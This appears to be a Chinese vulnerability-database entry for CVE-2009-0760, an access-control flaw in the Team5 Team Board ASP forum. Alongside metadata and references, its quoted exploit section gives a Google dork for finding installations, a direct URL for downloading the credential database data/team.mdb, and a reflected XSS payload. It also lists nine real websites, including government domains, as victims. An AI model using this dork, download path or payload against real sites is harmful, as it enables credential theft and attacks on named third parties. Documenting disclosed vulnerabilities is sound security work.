Team5 Team Board 'data/team.mdb'权限许可和访问控制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117348 漏洞类型 权限许可和访问控制
发布时间 2009-02-04 更新时间 2009-03-06
CVE编号 CVE-2009-0760 CNNVD-ID CNNVD-200903-149
漏洞平台 ASP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/7982
https://www.securityfocus.com/bid/79602
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-149
|漏洞详情
TeamBoard是team论坛是基于ASP技术开发的论坛系统。Board是Team的公告板组件。TeamBoard1.x版本和2.x版本在网根下储存敏感信息,但没有赋予足够的访问控制,这会允许远程攻击者可以借助对data/team.mdb的一个直接请求,下载一个包含凭证的数据库。
|漏洞EXP
#########################################################
---------------------------------------------------------
Portal Name: Team Board
Version : all version
Google Dork : team5 studio all rights reserved site:cn
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (DD/XSS)
---------------------------------------------------------
#########################################################
[DD]:
http://site.com/[Path]/data/team.mdb
 
[XSS]:
http://site.com/[Path]/online.asp?lookname=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>
---------------------------------
Victem :
http://cinv.vhost021.cn/team
http://sxx.gov.cn/bbs
http://gdemc.gov.cn/bbs
http://bslogistics.cn/bbs
http://qzjd.gov.cn/teams
http://szlhlib.com.cn/cgbbs
http://sh9383.com.cn/digibook
http://www.gsjnrk.gov.cn/team
http://www.sxlcfda.gov.cn/yjlt
---------------------------------------------------------
#########################################################

# milw0rm.com [2009-02-04]
|受影响的产品
Team5 Team Board 2.0.0 Team5 Team Board 1.0.0
|参考资料

来源:OSVDB
名称:51752
链接:http://www.osvdb.org/51752
来源:MILW0RM
名称:7982
链接:http://www.milw0rm.com/exploits/7982
来源:SECUNIA
名称:33839
链接:http://secunia.com/advisories/33839
来源:MISC
链接:http://packetstorm.linuxsecurity.com/0902-exploits/teamboard-ddxss.txt